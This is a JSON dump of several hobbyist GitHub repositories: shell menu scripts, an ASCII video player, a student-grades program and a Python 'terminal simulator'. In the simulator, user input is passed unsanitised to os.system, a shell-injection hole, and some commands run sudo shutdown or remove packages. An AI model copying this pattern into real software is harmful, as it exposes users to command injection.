torch.optim.lr_scheduler.StepLR(\n optim, step_size=50, gamma=0.8)\n\n return {\n 'optimizer': optim,\n 'lr_scheduler': {\n 'scheduler': scheduler,\n 'interval': 'epoch',\n }\n }\n"
},
{
"alpha_fraction": 0.7731629610061646,
"alphanum_fraction": 0.7987220287322998,
"avg_line_length": 27.545454025268555,
"blob_id": "72d68f2b52b5606d82597ed063dee202695bcdec",
"content_id": "0cc08bf94a8dc1535a250ca7b1ee08d1519aefa8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 313,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 11,
"path": "/download_data.sh",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "mkdir -p data\n\n# Imagenette install instructions\nwget https://s3.amazonaws.com/fast-ai-imageclas/imagenette2.tgz\ntar -xzf imagenette2.tgz -C data/\nrm imagenette2.tgz\n\n# Imagewoof install instructions\nwget https://s3.amazonaws.com/fast-ai-imageclas/imagewoof2.tgz\ntar -xzf imagewoof2.tgz -C data/\nrm imagewoof2.tgz"
}
] | 6 |
rodrigostellitano/ProjectStudyBasic
|
https://github.com/rodrigostellitano/ProjectStudyBasic
|
ace02202549d4cb5f78f831c53cc07b675439eae
|
0033e2d14246a087e5b1ac777ade2386b6a3afba
|
d30c5ff689d6b5682b7e7ca318545e5eafdf2cbf
|
refs/heads/master
| 2021-05-21T21:57:52.146336 | 2020-05-01T17:31:36 | 2020-05-01T17:31:36 | 252,819,056 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5604488849639893,
"alphanum_fraction": 0.5755823850631714,
"avg_line_length": 23.81012725830078,
"blob_id": "e4045449cb0d82a1df6284096b9c5774b6ee8a94",
"content_id": "c527a4ba2a13390773302ecc9ea3fbcdb0cc4fc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5905,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 237,
"path": "/avarage.py",
"repo_name": "rodrigostellitano/ProjectStudyBasic",
"src_encoding": "UTF-8",
"text": "\n\"Faça um Programa que peça as quatro notas de 10 alunos, calcule e armazene num vetor a média de cada aluno, imprima o número de alunos com média maior ou igual a 7.0. \"\n# Menu\n# Inserir aluno\n# Deletar aluno\n# adicionar nota\n# excluir nota\n# media da turma\n\nimport sys, os\n\n# Menu\ndef main_menu():\n print(\"Bem vindo,\\n\")\n print(\"Escolha as opções:\")\n print(\"1. Inserir aluno\")\n print(\"2. Deletar aluno\")\n print(\"3. Listar aluno\")\n print(\"4. Inserir Nota\")\n print(\"5. Média\")\n print(\"\\n0. Quit\")\n choice = input(\" >> \")\n exec_menu(choice)\n\n return\n\n\n# Executa o Menu1\ndef exec_menu(choice):\n os.system('cls')\n ch = choice.lower()\n if ch == '':\n menu_actions['main_menu']()\n else:\n try:\n menu_actions[ch]()\n except KeyError:\n\n print(\"Invalid selection, please try again.\\n\")\n menu_actions['main_menu']()\n return\n\n\n# Inserir o aluno\ndef inserir_aluno():\n os.system('cls')\n\n global indice_aluno\n\n indice_aluno = len(lista_aluno.keys())\n\n nome = input(\"Digite o nome do aluno:\")\n lista_aluno[indice_aluno] = [nome]\n lista_aluno[indice_aluno].insert(1,'A')\n\n print(\"Aluno inserido\")\n print(\"O nome do aluno incluido é: {} e o seu ID é: {}\".format(nome, indice_aluno))\n #indice_aluno = indice_aluno + 1\n\n choice_inserir_aluno = input(\"Deseja adicionar mais aluno?\")\n choice_inserir_aluno.lower()\n # Poderia criar a rotina toda de menu novamente, mas decidi não\n\n if choice_inserir_aluno == 's':\n inserir_aluno()\n if choice_inserir_aluno == 'n':\n main_menu()\n else:\n print(\"Escolha invalida, retornando ao Menu Inicial\")\n main_menu()\n\n\n# Listar Aluno\ndef listar_aluno():\n os.system('cls')\n list_status = []\n\n status = input('Deseja listar os alunos (A)tivos ou (I)nativos?')\n\n for i in lista_aluno.keys():\n list_status.append(lista_aluno[i][1])\n\n if status.upper() in list_status:\n listar_aluno_total(status)\n else:\n res = \"Ativos\" if status.upper() == 'A' else \"Inativos\"\n print(\"A lista não possui alunos \" + res)\n\n input(\"Pressione <enter> para continuar\")\n main_menu()\n\n# Deletar Aluno\ndef deletar_aluno():\n listar_aluno_total('A')\n list_status = []\n\n for i in lista_aluno.keys():\n list_status.append(lista_aluno[i][1])\n\n if 'A' not in list_status:\n print(\"Não possui alunos ativos no Sistema para Deletar\")\n main_menu()\n\n id_delet = input('Escolha uma ID - CASO NÃO DESEJE DELETAR NINGUÉM DIGITE Z ')\n\n if id_delet.lower() == 'z':\n main_menu()\n\n\n if int(id_delet) in lista_aluno.keys() and lista_aluno[int(id_delet)][1] == 'A':\n lista_aluno[int(id_delet)][1] = 'I'\n else:\n print('ID NÃO LOCALIZADA')\n deletar_aluno()\n\n input(\"Digite <enter> para continuar\")\n main_menu()\n\n# Inserir nota\n#LAYOUT {'id': ['nome', stats, 'nota1', 'nota2', 'nota3', 'media', ]}\n\ndef inserir_nota():\n os.system('cls')\n #list_status = []\n listar_aluno_total('A')\n\n id_aluno = input(\"Selecione o ID que deseja adicionar a nota - CASO NÃO DESEJE INSERIR NOTA DIGITE Z \")\n\n if id_aluno.isnumeric():\n id_aluno = int(id_aluno)\n\n if id_aluno in lista_aluno.keys() and lista_aluno[id_aluno][1] == \"A\":\n n1 = float(input(\"Insira a nota 1: \"))\n lista_aluno[id_aluno].insert(2, n1)\n n2 = float(input(\"Insira a nota 2: \"))\n lista_aluno[id_aluno].insert(3, n2)\n n3 = float(input(\"Insira a nota 3: \"))\n lista_aluno[id_aluno].insert(4, n3)\n media = (n1 + n2 + n3) / 3\n lista_aluno[int(id_aluno)].insert(5, media)\n\n resultado = format(lista_aluno[id_aluno][5],'.2f')\n print(\"Sua média é: \" + str(resultado))\n input(\"Pressione <Enter> para continuar\")\n inserir_nota()\n else:\n print(\"Aluno Inativo, tente outro ID\")\n input(\"Pressione <Enter> para voltar\")\n inserir_nota()\n #teste\n elif id_aluno.lower() == 'z':\n main_menu()\n\n#Opção de listar alunos\n\ndef listar_aluno_total(status):\n if len(lista_aluno) == 0:\n print('Lista Vazia!')\n main_menu()\n\n\n for key in lista_aluno.keys():\n\n if lista_aluno[key][1] == status.upper():\n print(str(key) + '- ' + lista_aluno[key][0])\n\n\ndef media():\n\n listar_aluno_total(\"A\")\n\n\n porcentagem_media = input(\"Informe a media (1 - 10) - CASO NÃO DESEJE INSERIR NOTA DIGITE Z \")\n\n for key in lista_aluno:\n if float(porcentagem_media) > lista_aluno[key][5] and lista_aluno[key][1] == 'A':\n print(\"Aluno: \" + lista_aluno[key][0] + '| Media: ' + str(lista_aluno[key][5]))\n\n\n media()\n if porcentagem_media.lower() == 'z':\n main_menu()\n\ndef exit():\n sys.exit()\n\n\ndef back():\n menu_actions['main_menu']()\n\n\n# Lista do menu\nmenu_actions = {\n 'main_menu': main_menu,\n '1': inserir_aluno,\n '2': deletar_aluno,\n '3': listar_aluno,\n '4': inserir_nota,\n '5': media,\n '9': back,\n '0': exit,\n}\n\n#LAYOUT {'id': ['nome', stats, 'nota1', 'nota2', 'nota3', 'media']}\n\nlista_aluno = {\n 1: ['Rodrigo', 'A', 10, 10, 10,10 ],\n 2: ['Rodrigo2', 'I', 5, 5, 5, 5],\n 3: ['Rodrigo3', \"A\", 3,2,1,2],\n 4: ['Rodrigo4', \"A\", 3,2,1,2]\n}\n\nindice_aluno = 1\nindice_nota = 1\n\nmain_menu()\n\n\n\n'turma_um.pesquisar_aluno(\"Rodrigo\")'\n\n\nclass Turma():\n aluno_nome = list()\n\n def inserir_aluno(self, nome):\n self.aluno_nome.append(nome)\n\n def listar_aluno(self):\n print(self.aluno_nome)\n\n def pesquisar_aluno(self, nome):\n try:\n pos = self.aluno_nome.index(nome)\n\n print(\"O nome procurado foi: {} e o indice dele é: {} \".format(self.aluno_nome[pos], pos))\n except ValueError:\n print(\"Nome não localizado na lista\")\n"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 22,
"blob_id": "cc667496b5fc854a91f47ea5e3d6df0b70d1fd04",
"content_id": "3e9920223840ec56b140b50ceda9f3112995a740",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 1,
"path": "/README.md",
"repo_name": "rodrigostellitano/ProjectStudyBasic",
"src_encoding": "UTF-8",
"text": "#Aprendendo GIT JUNTO!"
}
] | 2 |
RockZombie123/PythonProjects
|
https://github.com/RockZombie123/PythonProjects
|
faa871102b6652a7ac71e15d498f45837d99d680
|
00b8b41f519e5b835fda828d4264acfcdc473ce3
|
b2ccd5f86d2547971de6234bf028876702ad879e
|
refs/heads/main
| 2023-09-02T05:50:52.937242 | 2021-11-18T03:09:53 | 2021-11-18T03:09:53 | 422,275,084 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.45470085740089417,
"alphanum_fraction": 0.48376068472862244,
"avg_line_length": 21.745098114013672,
"blob_id": "743094837bb046d8c5ed1b3da9ee366ad35b972e",
"content_id": "b4138cd4ea2e883da0d8a6b4a7e337d48807e470",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 51,
"path": "/root.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nHEIGHT=15\nWIDTH=40\nCHOICE_HEIGHT=4\nBACKTITLE=\"< Applications\"\nTITLE=\"Root\"\nMENU=\"Choose one of the following files:\"\n\nOPTIONS=(1 \"/home/s29sshankar/validation2.py\"\n 2 \"/home/s29sshankar/PythonProjects/simulator.py\"\n 3 \"/home/s29sshankar/menu.sh\"\n\t 4 \"/home/s29sshankar/root.sh\"\n\t 5 \"/home/s29sshankar/apps.sh\")\n\n\nCHOICE=$(dialog --clear \\\n --backtitle \"$BACKTITLE\" \\\n --title \"$TITLE\" \\\n --menu \"$MENU\" \\\n $HEIGHT $WIDTH $CHOICE_HEIGHT \\\n \"${OPTIONS[@]}\" \\\n 2>&1 >/dev/tty)\n\nclear\ncase $CHOICE in\n 1)\n echo \"You chose Option 1\"\n nano validation2.py\n ;;\n 2)\n echo \"You chose Option 2\"\n cd PythonProjects\n\t nano simulator.py\n ;;\n 3)\n echo \"You chose Option 3\"\n\t chmod +x menu.sh\n\t nano menu.sh\n\t ;;\n\t4)\n echo \"You chose Option 4\"\n chmod +x root.sh\n nano root.sh\n ;;\n 5)\n echo \"You chose Option 5\"\n chmod +x apps.sh\n nano apps.sh\n ;;\nesac \n"
},
{
"alpha_fraction": 0.4419191777706146,
"alphanum_fraction": 0.46212121844291687,
"avg_line_length": 19.30769157409668,
"blob_id": "0ca647dea81b1b2c2cbe8e26f9026f892647319d",
"content_id": "0cd9eee6648dac4584641c65753e818cb6857f5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 792,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 39,
"path": "/games.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nHEIGHT=15\nWIDTH=40\nCHOICE_HEIGHT=4\nBACKTITLE=\"< Menu\"\nTITLE=\"Games\"\nMENU=\"Choose one of the following Games:\"\n\nOPTIONS=(1 \"Snake\"\n 2 \"Simon Says\"\n 3 \"Other games\")\n\nCHOICE=$(dialog --clear \\\n --backtitle \"$BACKTITLE\" \\\n --title \"$TITLE\" \\\n --menu \"$MENU\" \\\n $HEIGHT $WIDTH $CHOICE_HEIGHT \\\n \"${OPTIONS[@]}\" \\\n 2>&1 >/dev/tty)\n\nclear\ncase $CHOICE in\n 1)\n echo \"You chose Option 1\"\n\t chmod +x snake.sh\n ./snake.sh\n ;;\n 2)\n echo \"You chose Option 2\"\n\t chmod +x simon.sh\n ./simon.sh\n ;;\n 3)\n\t echo \"You chose Option 3\"\n\t chmod +x othergames.sh\n\t ./othergames.sh\n\t ;;\nesac\n"
},
{
"alpha_fraction": 0.442827433347702,
"alphanum_fraction": 0.46569645404815674,
"avg_line_length": 16.490909576416016,
"blob_id": "c28a72edc823117eb15bb28925516492e6e8df91",
"content_id": "f9babf99b24dda23caeba80e871c811def485210",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 962,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 55,
"path": "/menu.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nHEIGHT=15\nWIDTH=40\nCHOICE_HEIGHT=4\nBACKTITLE=\"< Quit\"\nTITLE=\"Menu\"\nMENU=\"Choose one of the following categories:\"\n\nOPTIONS=(1 \"Applications\"\n 2 \"Root\"\n\t 3 \"Help\"\n\t 4 \"Credits\"\n 5 \"Games\")\n\nCHOICE=$(dialog --clear \\\n --backtitle \"$BACKTITLE\" \\\n --title \"$TITLE\" \\\n --menu \"$MENU\" \\\n $HEIGHT $WIDTH $CHOICE_HEIGHT \\\n \"${OPTIONS[@]}\" \\\n 2>&1 >/dev/tty)\n\nclear\ncase $CHOICE in\n 1)\n echo \"You chose Option 1\"\n\t chmod +x apps.sh\n\t ./apps.sh\n ;;\n 2)\n echo \"You chose Option 2\"\n\t chmod +x root.sh\n\t ./root.sh\n ;;\n\n\n\t3)\n\t echo \"You chose Option 3\"\n\t chmod +x help.sh\n\t ./help.sh\n\t ;;\n\t\n\t4)\n\t echo \"You chose Option 4\"\n\t chmod +x credits.sh\n\t ./credits.sh\n\t ;;\n\t\n 5)\n echo \"You chose Option 4\"\n\t chmod +x games.sh\n\t ./games.sh\n ;;\nesac\n"
},
{
"alpha_fraction": 0.5020492076873779,
"alphanum_fraction": 0.5297130942344666,
"avg_line_length": 21.18181800842285,
"blob_id": "b6b9a8c483100913a361c6283b3de4714f745e6d",
"content_id": "dcd494c281bb448d88c4a58722f1ad1b913a190d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 44,
"path": "/apps.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nHEIGHT=15\nWIDTH=40\nCHOICE_HEIGHT=4\nBACKTITLE=\"< Menu\"\nTITLE=\"Applications\"\nMENU=\"Choose one of the following applications:\"\n\nOPTIONS=(1 \"Terminal\"\n 2 \"Music Player\"\n\t 3 \"Update\"\n 4 \"ASCII Video Player\")\n\nCHOICE=$(dialog --clear \\\n --backtitle \"$BACKTITLE\" \\\n --title \"$TITLE\" \\\n --menu \"$MENU\" \\\n $HEIGHT $WIDTH $CHOICE_HEIGHT \\\n \"${OPTIONS[@]}\" \\\n 2>&1 >/dev/tty)\n\nclear\ncase $CHOICE in\n 1)\n echo \"You chose Option 1\"\n\t cd PythonProjects/\n python3 simulator.py\n ;;\n 2)\n echo \"You chose Option 2\"\n\t python3 musicplayer.py\n ;;\n\n\t3)\n\t echo \"Downloading from: https://github.com/RockZombie123/PythonProjects.git\"\n\t git clone https://github.com/RockZombie123/PythonProjects.git\n\t ;;\n\n 4)\n echo \"You chose Option 4\"\n\t python3 asciivideo.py\n ;;\nesac\n"
},
{
"alpha_fraction": 0.5987846851348877,
"alphanum_fraction": 0.6143866181373596,
"avg_line_length": 32.63536071777344,
"blob_id": "ad44a0656211fcf0822eae3384b2457e80c72ef1",
"content_id": "d5f3a6f675907bc8aca490286f670b0ff1aaf322",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6089,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 181,
"path": "/asciivideo.py",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "\nimport cv2\nimport time\nimport sys\nfrom PIL import Image\nfrom multiprocessing import Process\nimport os\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\nimport fpstimer\nimport moviepy.editor as mp\n\n\nASCII_CHARS = [\"@\", \"#\", \"S\", \"%\", \"?\", \"*\", \"+\", \";\", \":\", \",\", \" \"]\nframe_size = 150\nframe_interval = 1.0 / 30.75\n\nASCII_LIST = []\n\n\ndef play_audio(path):\n pygame.init()\n pygame.mixer.pre_init(44100, -16, 2, 2048)\n pygame.mixer.init()\n pygame.mixer.music.load(path)\n pygame.mixer.music.play()\n\n\ndef play_video(total_frames):\n # os.system('color F0')\n os.system('mode 150, 500')\n\n timer = fpstimer.FPSTimer(30)\n\n start_frame = 0\n\n for frame_number in range(start_frame, total_frames):\n sys.stdout.write(\"\\r\" + ASCII_LIST[frame_number])\n timer.sleep()\n\n # os.system('color 07')\n\n\n# Extract frames from video\ndef extract_transform_generate(video_path, start_frame, number_of_frames=1000):\n capture = cv2.VideoCapture(video_path)\n capture.set(1, start_frame) # Points cap to target frame\n current_frame = start_frame\n frame_count = 1\n ret, image_frame = capture.read()\n while ret and frame_count <= number_of_frames:\n ret, image_frame = capture.read()\n try:\n image = Image.fromarray(image_frame)\n ascii_characters = pixels_to_ascii(greyscale(resize_image(image))) # get ascii characters\n pixel_count = len(ascii_characters)\n ascii_image = \"\\n\".join(\n [ascii_characters[index:(index + frame_size)] for index in range(0, pixel_count, frame_size)])\n\n ASCII_LIST.append(ascii_image)\n\n except Exception as error:\n continue\n\n progress_bar(frame_count, number_of_frames)\n\n frame_count += 1 # increases internal frame counter\n current_frame += 1 # increases global frame counter\n\n capture.release()\n\n\n# Progress bar code is courtesy of StackOverflow user: Aravind Voggu.\n# Link to thread: https://stackoverflow.com/questions/6169217/replace-console-output-in-python\ndef progress_bar(current, total, barLength=25):\n progress = float(current) * 100 / total\n arrow = '#' * int(progress / 100 * barLength - 1)\n spaces = ' ' * (barLength - len(arrow))\n sys.stdout.write('\\rProgress: [%s%s] %d%% Frame %d of %d frames' % (arrow, spaces, progress, current, total))\n\n\n# Resize image\ndef resize_image(image_frame):\n width, height = image_frame.size\n aspect_ratio = (height / float(width * 2.5)) # 2.5 modifier to offset vertical scaling on console\n new_height = int(aspect_ratio * frame_size)\n resized_image = image_frame.resize((frame_size, new_height))\n # print('Aspect ratio: %f' % aspect_ratio)\n # print('New dimensions %d %d' % resized_image.size)\n return resized_image\n\n\n# Greyscale\ndef greyscale(image_frame):\n return image_frame.convert(\"L\")\n\n\n# Convert pixels to ascii\ndef pixels_to_ascii(image_frame):\n pixels = image_frame.getdata()\n characters = \"\".join([ASCII_CHARS[pixel // 25] for pixel in pixels])\n return characters\n\n\n# Open image => Resize => Greyscale => Convert to ASCII => Store in text file\ndef ascii_generator(image_path, start_frame, number_of_frames):\n current_frame = start_frame\n while current_frame <= number_of_frames:\n path_to_image = image_path + '/BadApple_' + str(current_frame) + '.jpg'\n image = Image.open(path_to_image)\n ascii_characters = pixels_to_ascii(greyscale(resize_image(image))) # get ascii characters\n pixel_count = len(ascii_characters)\n ascii_image = \"\\n\".join(\n [ascii_characters[index:(index + frame_size)] for index in range(0, pixel_count, frame_size)])\n file_name = r\"TextFiles/\" + \"bad_apple\" + str(current_frame) + \".txt\"\n try:\n with open(file_name, \"w\") as f:\n f.write(ascii_image)\n except FileNotFoundError:\n continue\n current_frame += 1\n\n\ndef preflight_operations(path):\n if os.path.exists(path):\n path_to_video = path.strip()\n cap = cv2.VideoCapture(path_to_video)\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n cap.release()\n\n video = mp.VideoFileClip(path_to_video)\n path_to_audio = 'audio.mp3'\n video.audio.write_audiofile(path_to_audio)\n\n frames_per_process = int(total_frames / 4)\n\n process1_end_frame = frames_per_process\n process2_start_frame = process1_end_frame + 1\n process2_end_frame = process2_start_frame + frames_per_process\n process3_start_frame = process2_end_frame + 1\n process3_end_frame = process3_start_frame + frames_per_process\n process4_start_frame = process3_end_frame + 1\n process4_end_frame = total_frames - 1\n\n start_time = time.time()\n sys.stdout.write('Beginning ASCII generation...\\n')\n extract_transform_generate(path_to_video, 1, process4_end_frame)\n execution_time = time.time() - start_time\n sys.stdout.write('ASCII generation completed! ASCII generation time: ' + str(execution_time))\n\n return total_frames\n\n else:\n sys.stdout.write('Warning file not found!\\n')\n\n\ndef main():\n while True:\n sys.stdout.write('==============================================================\\n')\n sys.stdout.write('Select option: \\n')\n sys.stdout.write('1) Play\\n')\n sys.stdout.write('2) Exit\\n')\n sys.stdout.write('==============================================================\\n')\n\n user_input = str(input(\"Your option: \"))\n user_input.strip() # removes trailing whitespaces\n\n if user_input == '1':\n user_input = str(input(\"Please enter the video file name (file must be in root!): \"))\n total_frames = preflight_operations(user_input)\n play_audio('audio.mp3')\n play_video(total_frames=total_frames)\n elif user_input == '2':\n exit()\n continue\n else:\n sys.stdout.write('Unknown input!\\n')\n continue\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7488372325897217,
"alphanum_fraction": 0.7627906799316406,
"avg_line_length": 60.42856979370117,
"blob_id": "fba70e5462a7611ac882d9175f3988c79c932126",
"content_id": "15896e8ec77a0b588c33d4a19a475b76142f3ab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 237,
"num_lines": 7,
"path": "/README.md",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "# PythonProjects\nPython projects. Going to post stuff like an \"app store\" I created. ONLY PYTHON PROJECTS WILL BE POSTED IN THIS REPOSITORY.\n\n1. Terminal is out now!\n2. Barrel OS 1.0 is out!\n\nNote: Ignore the message: \"YOU HAVE BEEN INFECTED HAHAHAHA !!!\" it's just coming from an annoying program I made looking at a tutorial for how to make a harmless virus. I am going to delete that file and remove the message in update 1.1.\n"
},
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7629629373550415,
"avg_line_length": 8,
"blob_id": "a05b6b7d4aa437a65cc09693337abb3cdbae3e45",
"content_id": "eb663306bd0c9935f9c06bbabe7e27d8f2fa1bcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 15,
"path": "/othergames.sh",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "clear\n\npython3 -m pip install freegames\n\nclear\n\npython3 -m freegames --help\n\nsleep 10\nclear\n\npython3 -m freegames list\n\nsleep 10\nclear\n"
},
{
"alpha_fraction": 0.6375218629837036,
"alphanum_fraction": 0.6602548360824585,
"avg_line_length": 24.018749237060547,
"blob_id": "4a4f4e8763e65eb721a2dfe355b71aa0bb4e8615",
"content_id": "86700af3269664c20748152e6fcbef8ccb4cde95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4003,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 160,
"path": "/simulator.py",
"repo_name": "RockZombie123/PythonProjects",
"src_encoding": "UTF-8",
"text": "import psutil\nimport time\nimport os\n\n\nlist = ['---', 'python3', 'idle']\n\nprint('This simulator does not contain any databases, and thus data will NOT be saved.')\n\nter = input('bash@user: ')\n#strter = ter.split()[1]\n\n\nif ter == 'cpu':\n print('Collecting cpu data...')\n print('cpu percentage:',psutil.cpu_percent())\n print('RAM:',psutil.virtual_memory())\n print('RAM (dict):',dict(psutil.virtual_memory()._asdict()))\n print('RAM (percent):',psutil.virtual_memory().percent)\n print('total percentage of available memory:',psutil.virtual_memory().available * 100 / psutil.virtual_memory().total)\n \nelif ter == 'pip installed':\n print('running setup...')\n time.sleep(0.1)\n print('loading list...')\n time.sleep(0.1)\n print('Warning: This feature will only work on a terminal.')\n print('pip installed modules:')\n os.system('pip list')\n\n\nelif ter == 'pip3 installed':\n print('Fetching new data...')\n time.sleep(0.1)\n print('Warning: This feature will only work on a terminal.')\n print('pip3 installed modules:')\n os.system('pip3 list')\n \nelif ter == 'install ' + list[1]:\n os.system('sudo apt-get install python3')\n\nelif ter == 'install ' + list[2]:\n os.system('sudo apt-get install idle')\n \nelif ter == 'delete' + list[1]:\n os.system('sudo apt-get remove python3')\n \nelif ter == 'delete' + list[2]:\n os.system('sudo apt-get remove idle')\n\nelif ter == 'open':\n\tfilename = input('File to open: ')\n\ttry:\n\t\tos.system(f\"nano {filename}\")\n\n\texcept:\n\t\tclass bcolors:\n \t\t\tHEADER = '\\033[95m'\n \t\t\tOKBLUE = '\\033[94m'\n \t\t\tOKCYAN = '\\033[96m'\n \t\t\tOKGREEN = '\\033[92m'\n\t \t\tWARNING = '\\033[93m'\n\t \t\tFAIL = '\\033[91m'\n\t \t\tENDC = '\\033[0m'\n\t \t\tBOLD = '\\033[1m'\n\t \t\tUNDERLINE = '\\033[4m'\n\n\t\tprint(f\"{bcolors.FAIL}Failed to open file, contact [email protected] for crash report.{bcolors.ENDC}\")\n\n\nelif ter == 'install':\n\tprint(\"\"\"\n\ninstall [APPLICATION]\ndelete [APPLICATION]\n\n\n\"\"\")\n\nelif ter == 'delete':\n\tprint(\"\"\"\n\ndelete [APPLICATION]\ninstall [APPLICATION]\n\n\n\"\"\")\n\n\nelif ter == 'ver' or ter == 'version':\n\tprint(\"\"\"\n\nBARREL OS VER: v1.0\n\nTHIS IS A FREE SIMULATION OF SOFTWARE.\nJUST GIVE CREDIT TO ORIGINAL CREATOR, AND YOU ARE FREE TO MAKE DIFFERENT DISTRIBUTIONS.\nCONTACT: [email protected] FOR MORE INFORMATION.\n\"\"\")\n\nelif ter == 'help':\n\tprint('''\n\ncpu - prints cpu data\nallinfo - prints all hardware and software data (stats for nerds)\npip installed - prints a list of all the installed modules using pip\npip3 installed - prints a list of all the installed modules using pip3\ninstall - installs the application\ndelete - deletes the application\nopen - opens a file\necho - the 'print' function in python\nshutdown - shuts down linux/raspbian\nver - prints version of this simulator\nhelp - displays this help message\n\n''')\n\nelif ter == 'allinfo':\n\tprint(psutil.cpu_times())\n\tprint(psutil.cpu_percent(1))\n\tprint(\"Number of cores in system\", psutil.cpu_count())\n\tprint(\"\\nNumber of physical cores in system\",)\n\tprint(\"CPU Statistics\", psutil.cpu_stats())\n\tprint(psutil.cpu_freq())\n\tprint(psutil.getloadavg())\n\tprint(psutil.virtual_memory())\n\tprint(psutil.swap_memory())\n\tprint(psutil.disk_partitions())\n\tprint(psutil.disk_usage('/'))\n\tprint(psutil.net_io_counters())\n\tprint(psutil.net_connections())\n\tprint(psutil.net_if_addrs())\n\tprint(psutil.sensors_temperatures())\n\tprint(psutil.sensors_fans())\n\tclass bcolors:\n\t\tWARNING = '\\033[93m'\n\t\tFAIL = '\\033[91m'\n\t\tENDC = '\\033[0m'\n\t\tBOLD = '\\033[1m'\n\t\tUNDERLINE = '\\033[4m'\n\n\tprint(f\"{bcolors.WARNING}WARNING: BATTERY CHECK MAY NOT WORK ON SOME DEVICES.{bcolors.ENDC}\")\n\tprint(psutil.sensors_battery())\n\tprint(psutil.boot_time())\n\tprint(psutil.users())\n\t\nelif ter == 'shutdown':\n\tprint(\"Shutdown begins in 3 seconds\")\n\ttime.sleep(3)\n\tos.system(\"sudo shutdown -h now\")\n\nelif ter == 'echo':\n\techo = input(\"What would you like to print? \")\n\tprint(echo)\n\nelif ter == 'update':\n\tprint(\"Updating simulator...\")\n\texec(open(\"update.py\").read())\n\nelse:\n print(\"-bash: '\" + ter + \"': command not found\")\n"
}
] | 8 |
masterfulEJ/pythonProjects
|
https://github.com/masterfulEJ/pythonProjects
|
c0af8f8e71e01d2b378a1b9a5e6ec2d9e142951c
|
72c4e90e7966a393522355287a181c9d1e902ac1
|
49065b6c808c17a77f7f8101a6f90c5fe6efe48a
|
refs/heads/master
| 2021-01-23T18:58:12.781782 | 2018-06-24T09:50:50 | 2018-06-24T09:50:50 | 83,006,116 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6814461350440979,
"alphanum_fraction": 0.6974761486053467,
"avg_line_length": 31.701148986816406,
"blob_id": "1abb19e793d2d21d07a33c1ae5e5038e6590e508",
"content_id": "fda6ba4b03d1cf31e56c85ae17fc979cb6090229",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2932,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 87,
"path": "/SGTrip/LSTM/lstm.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "import numpy\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport math\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import LSTM\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\n# convert an array of values into a dataset matrix\r\ndef create_data(dataset, look_back=1):\r\n dataX, dataY = [], []\r\n for i in range(len(dataset)-look_back):\r\n a = dataset[i:(i+look_back), 0]\r\n dataX.append(a)\r\n dataY.append(dataset[i + look_back, 0])\r\n\r\n return numpy.array(dataX), numpy.array(dataY)\r\n\r\n# fix random seed for reproducibility\r\nnumpy.random.seed(7)\r\n\r\n# load the dataset\r\ndataframe = pd.read_excel('us_gdp.xlsx', index_col=0)\r\nplt.figure()\r\nplt.plot(dataframe)\r\ndataset = dataframe.values\r\n\r\nlook_back = 5\r\nX, Y = create_data(dataset, look_back)\r\nlasta = dataset[len(dataset)-look_back:len(dataset), 0]\r\nX = numpy.vstack([X, numpy.reshape(lasta, (1, lasta.shape[0]))])\r\n\r\n# split into train and test sets\r\ntrain_size = int(len(Y) * 0.67)\r\ntest_size 